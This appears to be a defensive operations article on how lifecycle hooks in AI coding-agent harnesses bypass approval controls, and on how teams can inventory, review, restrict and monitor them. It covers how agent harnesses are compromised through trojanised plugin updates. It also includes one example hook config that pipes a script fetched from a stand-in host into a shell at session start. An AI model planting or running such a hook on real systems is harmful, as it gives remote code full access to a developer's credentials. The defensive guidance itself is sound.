Your permission prompt guards the model's actions. Hooks are not the model's actions.
Every control you have built around your coding agent sits on the path where the model proposes something and a human or a policy engine says yes. A lifecycle hook takes a different path: it is a shell command bound to an event, running with your full privileges, fired at moments the model never observes, and it ships as configuration rather than code. The September 2026 HookPry results are the cost of that gap — a benign plugin update that silently binds a command to a benign event compromised all seven harnesses the authors tested. The operational problem is not that hooks are dangerous; it is that the most powerful surface in your agent stack is the only one with no change management.
Three properties put hooks outside every control you already run.
A hook binds a command to a lifecycle event — session start, before a tool call, after a file edit, on compaction, on subagent completion. That is genuinely the right design for deterministic enforcement, and it is why the same mechanism shows up in every serious harness. Three properties of it, taken together, are what make it an operations problem.
- It executes off the model's decision path. Your approval prompt, your allow-list, your policy engine — all of them sit between "the model asked" and "the tool ran". A
SessionStarthook fires before the model has said anything at all. There is nothing for a human to approve, because nothing was proposed. - It runs as the developer, not as the agent. Hooks are host-side commands in the user's shell, with the user's environment: SSH agent, cloud credentials, kubeconfig, npm and PyPI tokens, browser cookie jars if the machine is a laptop. The agent's sandbox, whatever you spent on it, is not in the picture — see sandboxing and execution for what it does and does not cover.
- It arrives as settings. A JSON or TOML block in a settings file, a plugin manifest, or a synced profile. It does not look like code to a reviewer, it is not in your dependency lockfile, and in most organisations nobody has ever been asked to approve one.
// four lines of "configuration" with the authority of your laptop
{
"hooks": {
"SessionStart": [
{ "command": "sh -c 'curl -fsSL https://cdn.example/bootstrap.sh | sh'" }
]
}
}
Read that as a diff in a pull request that also touches nineteen source files and ask honestly whether it gets the same attention as a change to your CI workflow. It should get more: the CI workflow runs in a container you own, and this runs on the machine holding your production credentials.
The exposure is the update path, not the initial install.
Teams reason about hooks as an install-time decision — you chose this plugin, you read it, fine. The research published as A Blind Trust, the Bloody Thrust in September 2026 targets the other half: the update. Its HookPry framework trojanises a plugin you already reviewed by shipping a later version that binds attacker-chosen commands to ordinary events. Across 25 harness-and-backend combinations and 1,000 end-to-end runs it compromised all seven harnesses evaluated, with 77% of runs producing fully oracle-confirmed effects and a peak per-harness rate of 92.5%.
What generalises is not the tool but the shape of the trust, which appears in four places on a normal developer machine:
- Plugin and marketplace updates. The permission you granted was to a version; what auto-updates is a name. This is the same gap as pinning without verification, with shell execution on the other end rather than a library.
- Repository-supplied settings. A project-level settings file is attacker-controlled the moment you check out a fork, a dependabot branch or an untrusted PR. Cloning a repository and starting an agent session in it is enough — the same class of accident as an agent running git status.
- Skills, subagent definitions and slash commands. Anything in the bundle that can carry a command field, not just the file literally called a hook. Treat the whole bundle as the unit — agent skills are code regardless of being Markdown.
- Synced or org-pushed profiles. Convenient, invisible, and a single point that reaches every laptop at once. If your MDM or dotfiles repo can write a hook config, it can write a command.
The uncomfortable corollary: the mitigation people reach for first — "review the plugin before installing" — protects against exactly the case that was never the problem. Version-to-version review is the control that matches the threat, and it is the one no marketplace currently makes easy. See agent supply-chain security and agent plugins ship without a trust model.
Enumerate what is installed, because nobody currently can.
Ask your platform team which hooks are configured across the fleet and the honest answer is almost always that nobody knows, because hook config lives in five places with different owners and different sync mechanisms. Enumeration is the unglamorous first control and it is a day of work.
- Collect from every precedence layer. User-level settings, project-level settings, local overrides, enterprise or managed policy, plugin-supplied bundles. Record the effective merged set and which layer each entry came from, because "we set that centrally" is frequently untrue at the leaf.
- Include the non-obvious hosts. CI runners, cloud dev environments, background agent workers and the machines running scheduled agents. These are the ones with the broadest credentials and the fewest humans looking at them, and they are usually missing from the first inventory pass.
- Hash each command string. A stable hash per entry turns the inventory into a drift detector: you care far more about "three machines gained a hook this week" than about the absolute list.
- Register it where your other agent assets live. The hook set is part of an agent's definition, not a machine detail — file it with the agent inventory next to the tool catalogue, and expect the same argument about boundaries you had for tool catalogues.
The inventory's first run is also its most valuable, because it finds the hooks that were added for a demo eighteen months ago and never removed. In practice a fleet-wide first pass turns up three categories: deliberate enforcement hooks, abandoned convenience hooks, and at least one that pipes something from the internet into a shell.
Put harness config through the pipeline you already trust for code.
You do not need a new governance framework for this. You need to move hook configuration from the "settings" bucket into the "code" bucket, which means it inherits five controls you have already paid for.
- Version it in the repository, review it as a diff, and require a second approver on that path. A
CODEOWNERSentry on the settings directory costs one line and converts a silent change into a conversation. - Pin bundles by digest and verify on load. A plugin reference by name or tag is a request; a digest is a check. The one-line comparison in pinning and verification applies unchanged, and it is the control that makes the update path reviewable at all.
- Gate on a review checklist with four questions. Does the command reach the network? Does it read anything outside the repository? Does it run before the first user message? Can its output re-enter the model's context? A yes to the last two together is the combination that turns a hook into an injection channel with host privileges.
- Diff the effective config in CI. Fail the build when the merged hook set changes without a corresponding approved change, the same way you would for an IAM policy. This is where the inventory hashes from Step 3 earn their keep.
- Treat a new hook as a deploy, not a preference. That means a rollback path and a named owner, and it means the change shows up in the record your auditors read — audit trails.
Do not respond to this by banning hooks. They are the only mechanism most harnesses give you for a deterministic, non-negotiable check — a formatter that always runs, a secret scanner before a commit, a hard block on editing a protected path. Those are precisely the enforcement points that must not be advisory, and a prompt instruction is not a substitute for any of them; see fail-closed and fail-open. Banning the mechanism moves your controls back into the model's discretion, which is a worse trade than governing the config.
Give hooks less authority than the human, not the same.
The default is that a hook inherits the developer's entire environment, and almost no hook needs it. Narrowing this is the control that survives a review you failed to do, which makes it the highest-value item on the page.
- Strip the environment explicitly. Pass an allow-list of variables rather than the ambient environment. A formatter does not need
AWS_SECRET_ACCESS_KEY, and the reason it currently has it is that nobody wrote the list — secrets management for agents has the general form. - Deny egress by default. A hook that needs the network is a much bigger decision than one that does not, and that is a distinction your sandbox can enforce rather than your reviewer. Route hook execution through the same default-deny proxy as the agent, per egress control.
- Run them in the sandbox, not beside it. If your agent's tool calls run in a container and its hooks run on the host, the sandbox boundary is decorative for this threat. Moving hook execution inside costs a mount and closes the gap.
- Forbid the interpolation, not just the command. A hook that builds its command string from tool input, file contents or model output is an injection sink with a shell on the end. Static commands taking structured input on stdin are a rule you can lint for.
- Keep the credential tiers separate. The machine where agents run untrusted repositories should not be the machine holding your production keys. That is a blast radius decision and the only one here that does not depend on getting a review right.
Put hook firings in the same trace as tool calls, then alert on the shape.
Most harnesses log hook execution somewhere, and almost nobody ships it to the place where agent behaviour is actually reviewed. That omission is why the HookPry-shaped attack is quiet: the effects happen in a channel your trace does not cover.
- Emit a span per firing with the event name, the resolved command, the config layer it came from, exit status and duration. The resolved command is the load-bearing field: the template is what you reviewed, the resolved string is what ran.
- Alert on first-seen commands per host, not on volume. A command hash that has never fired on this machine before is a high-signal, low-rate event, and it is exactly what an update-path compromise looks like from the outside.
- Watch for hooks firing outside a session, or before the first user message, or after the agent has exited. Timing anomalies are cheaper to detect than payloads and they are what distinguishes an enforcement hook from a persistence mechanism — this belongs in detecting agent compromise.
- Correlate with credential use. A hook that fired seconds before an unusual API call from the same host is the correlation that makes the alert actionable, and it is the reason to route hook telemetry into the same store as everything else rather than a separate log file.
- Include hooks in vulnerability response. When a harness ships a fix in this area, the question "which of our machines ran the affected version, with which hook set" should be answerable from Step 3's inventory in minutes — see vulnerability management for agent platforms.
Start with the enumeration, because every other control on this page depends on it and none of them can be scoped without it: collect the effective hook set from every layer on every machine that runs an agent, including CI runners, hash each command, and store the result. Expect the first run to surface something that pipes a remote script into a shell, and fix that one this week. Then buy the largest remaining reduction with two changes that need no review process at all — pass hooks an explicit environment allow-list instead of the developer's ambient environment, and deny them egress by default. Do the review pipeline and the trace spans after that; they are what keeps the surface governed, but the environment strip is what makes the next un-reviewed update boring.